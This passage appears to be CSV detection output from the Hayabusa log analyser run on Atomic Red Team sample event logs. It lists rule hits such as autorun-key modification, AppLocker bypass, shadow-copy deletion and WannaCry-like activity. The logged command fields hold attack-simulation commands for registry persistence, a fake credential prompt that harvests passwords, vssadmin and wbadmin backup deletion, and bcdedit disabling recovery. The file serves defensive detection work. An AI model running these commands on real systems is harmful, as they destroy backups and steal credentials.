""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.292 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.349 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.371 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.274 